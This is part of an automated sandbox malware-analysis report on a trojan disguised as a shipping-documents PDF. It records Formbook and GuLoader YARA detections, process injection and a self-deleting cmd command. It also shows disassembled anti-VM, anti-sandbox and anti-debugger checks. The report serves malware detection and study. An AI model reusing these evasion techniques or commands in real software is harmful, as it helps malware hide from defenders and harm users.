      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1FF1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CD616
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03526E30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2EF7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1D55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2D07
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03500D20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D25DD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351D5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CD466
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351841F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6DB7D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52D89
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52D90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C59E40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C59E3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6DFC9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C52FB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0350B150 appears 48 times
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: String function: 1E3AB150 appears 35 times
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241735598.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.318768141.000000001E62F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312668816.0000000002590000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000000.240728958.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312648510.0000000002540000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: OriginalFilenamefdselskontrol.exe vs Shipping Documents (INV,PL,BL)_pdf.exe
      Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@4/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCBA05B85C1CFCA00.TMPJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Shipping Documents (INV,PL,BL)_pdf.exeVirustotal: Detection: 21%
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp, wlanext.exe, 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, wlanext.exe
      Source: Binary string: wlanext.pdb source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wlanext.pdbGCTL source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000003.311332726.00000000009C3000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.296872528.000000000E1C0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8356 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8365 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F07CD pushad ; retf
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F07EE pushad ; retf
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3FD0D1 push ecx; ret
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568355 push ds; iretd
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568365 push ds; iretd
      Source: C:\Windows\explorer.exeCode function: 3_2_061F83E6 pushad ; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0355D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6705B push esi; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C66989 push edi; retf
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C67C5E push esi; iretd
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C67D40 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CEE2 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CEEB push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CE95 push eax; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69666 push ss; iretd
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C66679 push ebp; retf
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6AE79 push ebx; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6BE12 push ebp; ret
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C6CF4C push eax; ret

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xED
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0E46 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0E55 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0EB1 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0EF6 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0F55 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0FA7 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0FEC TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1039 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F1083 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F10D7 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F117A TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D81 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0DE0 TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F11F6 TerminateProcess,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F8088 second address: 00000000020F8088 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0E14EF96D8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007F0E14EF96F6h 0x00000021 test cx, cx 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 pushad 0x00000029 mov ah, 87h 0x0000002b cmp ah, FFFFFF87h 0x0000002e jne 00007F0E14EF4D8Ch 0x00000034 popad 0x00000035 dec dword ptr [ebp+000000F8h] 0x0000003b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000042 jne 00007F0E14EF967Fh 0x00000044 cmp ax, cx 0x00000047 cmp dh, dh 0x00000049 call 00007F0E14EF975Bh 0x0000004e call 00007F0E14EF96EAh 0x00000053 lfence 0x00000056 mov edx, dword ptr [7FFE0014h] 0x0000005c lfence 0x0000005f ret 0x00000060 mov esi, edx 0x00000062 pushad 0x00000063 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000020F80AA second address: 00000000020F80AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E1437EC20h 0x0000001f popad 0x00000020 call 00007F0E1437E629h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000005680AA second address: 00000000005680AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E14EF9E30h 0x0000001f popad 0x00000020 call 00007F0E14EF9839h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000C598E4 second address: 0000000000C598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000C59B5E second address: 0000000000C59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe TID: 5736Thread sleep count: 190 > 30
      Source: C:\Windows\explorer.exe TID: 1320Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 5848Thread sleep time: -45000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000003.00000000.291283717.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000003.00000002.497929772.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000003.00000000.292196573.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000003.00000000.285586778.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Shipping Documents (INV,PL,BL)_pdf.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&v
      Source: explorer.exe, 00000003.00000002.498066885.0000000005603000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F4A77 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F421E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F8A85 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FAB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FFD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F7C4F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2C7F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F24E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E434257 mov eax, dword ptr fs:[00000030h]
